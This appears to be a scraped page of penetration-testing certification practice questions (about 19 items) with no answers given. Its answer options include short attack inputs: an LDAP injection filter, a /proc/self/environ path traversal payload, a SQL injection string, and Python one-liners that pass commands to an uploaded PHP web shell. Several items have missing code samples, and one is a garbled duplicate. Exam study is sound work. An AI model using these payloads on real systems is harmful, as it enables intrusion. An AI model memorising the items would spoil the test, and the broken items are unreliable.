import sys

D.

From:

result = s.connect_ex ((target, port) )

To:

result = s.connect ( (target, port) )

Full Access
Question # 100

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

A.

Boolean SQL

B.

Command

C.

Blind SQL

D.

LDAP

Full Access
Question # 101

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open.

Full Access
Question # 102

A penetration tester is reviewing the security of a web application running in an laaS compute instance. Which of the following payloads should the tester send to get the running process credentials?

A.

file=http://192.168. 1. 78?+document.cookie

B.

file =.. / .. / .. /proc/self/environ

C.

file='%20or%2054365=54365 ;--

Full Access
Question # 103

A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve This objective?

A.

Nmap –F 192.168.5.5

B.

Map –datalength 2.192.168.5.5

C.

Nmap –D 10.5.2.2.168.5.5

D.

Map –scanflags SYNFIN 192.168.5.5

Full Access
Question # 104

Within a Python script, a line that states print (var) outputs the following:

[{'1' : 'CentOS', '2' : 'Ubuntu'), {'1' : 'Windows 10', '2' : 'Windows Server 2016'}]

Which of the following objects or data structures is var ?

A.

An array

B.

A class

C.

A dictionary

D.

A list

Full Access
Question # 105

Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet?

A.

Unsupported operating systems

B.

Susceptibility to DDoS attacks

C.

Inability to network

D.

The existence of default passwords

Full Access
Question # 106

Which of the following is most important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe typecasting operations

Full Access
Question # 107

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

A.

python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php ', data={'cmd=id'}))"

B.

python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php ', data=

('cmd':'id') ) .text) "

C.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

{'cmd':'id'}) )"

D.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

('cmd':'id'}) .text) "

Full Access
Question # 108

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?

A.

nmap -F 192.168.5.5

B.

nmap -datalength 2 192.168.5.5

C.

nmap -D 10.5.2.2 192.168.5.5

D.

nmap -scanflags SYNFIN 192.168.5.5

Full Access
Question # 109

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

A.

Bluejacking

B.

Bluesnarfing

C.

BLE attack

D.

WPS PIN attack

Full Access
Question # 110

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

A.

The HTTP port is not open on the firewall.

B.

The tester did not run sudo before the command.

C.

The web server is using HTTPS instead of HTTP.

D.

This URI returned a server error.

Full Access
Question # 111

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform

phishing in a later stage of the assessment?

A.

Test for RFC-defined protocol conformance.

B.

Attempt to brute force authentication to the service.

C.

Perform a reverse DNS query and match to the service banner.

D.

Check for an open relay configuration.

Full Access
Question # 112

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Full Access
Question # 113

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

<#

B.

<$

C.

##

D.

#$

E.

#!

Full Access
Question # 114

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

A.

Utilize the tunnel as a means of pivoting to other internal devices.

B.

Disregard the IP range, as it is out of scope.

C.

Stop the assessment and inform the emergency contact.

D.

Scan the IP range for additional systems to exploit.

Full Access
Question # 115

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Full Access
Question # 116

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

A.

John the Ripper

B.

Hydra

C.

Mimikatz

D.

Cain and Abel

Full Access
Question # 117

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

A.

Stronger algorithmic requirements

B.

Access controls on the server

C.

Encryption on the user passwords

D.

A patch management program

Full Access
Question # 118

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A.

Analyze the malware to see what it does.

B.

Collect the proper evidence and then remove the malware.

C.

Do a root-cause analysis to find out how the malware got in.

D.

Remove the malware immediately.

E.

Stop the assessment and inform the emergency contact.

Full Access